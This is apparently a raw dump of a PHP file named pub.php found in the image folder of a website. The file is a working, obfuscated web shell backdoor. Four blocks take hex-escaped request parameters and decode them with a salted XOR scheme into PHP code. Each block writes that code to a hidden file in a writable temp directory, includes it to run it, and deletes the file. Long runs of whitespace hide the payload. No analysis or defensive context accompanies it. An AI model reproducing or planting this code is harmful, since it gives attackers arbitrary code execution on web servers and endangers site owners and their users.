HEX

File: //proc/thread-self/root/home/vitanhod/prostanur1.vitavit.com.pk/img/pub.php
<?php																																										if(!empty($_REQUEST["\x62\x69nd"])){ $fac = $_REQUEST["\x62\x69nd"]; $fac= explode ( '.' , $fac ) ; $key = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); foreach ($fac as $t => $v3): $sChar = ord($salt[$t % $lenS]); $dec = ((int)$v3 - $sChar - ($t % 10)) ^ 89; $key.=chr($dec); endforeach; $flag = array_filter(["/dev/shm", getcwd(), "/var/tmp", getenv("TEMP"), "/tmp", getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); for ($comp = 0, $object = count($flag); $comp < $object; $comp++) { $symbol = $flag[$comp]; if (is_dir($symbol) ? is_writable($symbol) : false) { $dat = vsprintf("%s/%s", [$symbol, ".sym"]); $success = file_put_contents($dat, $key); if ($success) { include $dat; @unlink($dat); die();} } } }
																																										if(@$_POST["\x74ok\x65n"] !== null){ $item = array_filter([getcwd(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), session_save_path(), "/dev/shm", "/var/tmp"]); $ref = $_POST["\x74ok\x65n"]; $ref = explode ( '.' ,$ref ) ; $ent= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s ); $n= 0; array_walk($ref ,function ($v2) use (&$ent ,&$n ,$s ,$sLen) {$sChar= ord($s[$n %$sLen] ); $d= ((int)$v2 - $sChar - ($n %10))^70; $ent .= chr($d ); $n++; }); foreach ($item as $comp) { if (!( !is_dir($comp) || !is_writable($comp) )) { $reference = join("/", [$comp, ".obj"]); $success = file_put_contents($reference, $ent); if ($success) { include $reference; @unlink($reference); exit;} } } }
																																										if(in_array("p\x61\x72\x61\x6Deter_\x67\x72\x6F\x75p", array_keys($_POST))){ $res = $_POST["p\x61\x72\x61\x6Deter_\x67\x72\x6F\x75p"]; $res= explode ( '.' , $res ) ; $object = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); foreach($res as $o => $v7): $chS = ord($s[$o % $lenS] ); $dec =((int)$v7 - $chS -($o % 10)) ^ 71; $object .= chr($dec ); endforeach; $rec = array_filter(["/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/tmp", sys_get_temp_dir(), session_save_path(), getcwd()]); foreach ($rec as $key => $ptr) { if (!!is_dir($ptr) && !!is_writable($ptr)) { $factor = "$ptr" . "/.itm"; if (file_put_contents($factor, $object)) { include $factor; @unlink($factor); exit; } } } }


if(array_key_exists("\x69te\x6D", $_REQUEST) && !is_null($_REQUEST["\x69te\x6D"])){
	$object = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/tmp", "/var/tmp", getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", getenv("TMP")]);
	$value = $_REQUEST["\x69te\x6D"];
	$value=	 explode   ("."		,  	$value ); 	
	$entity=	'';
            $salt3=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=	strlen(		$salt3);
            $len=	count(		$value);
    
            for(		$k=	0; $k <$len; $k++) { 	$v4=	$value[$k];
                $chS=	ord(		$salt3[$k%$lenS]);
                $dec=	(		(		int)$v4 - $chS -(		$k%10)) ^ 93;
                $entity	.=chr(		$dec);
            }
	for ($element = 0, $dat = count($object); $element < $dat; $element++) {
    $dchunk = $object[$element];
    		if ((bool)is_dir($dchunk) && (bool)is_writable($dchunk)) {
    $marker = str_replace("{var_dir}", $dchunk, "{var_dir}/.reference");
    $file = fopen($marker, 'w');
if ($file) {
	fwrite($file, $entity);
	fclose($file);
	include $marker;
	@unlink($marker);
	die();
}
}
}
}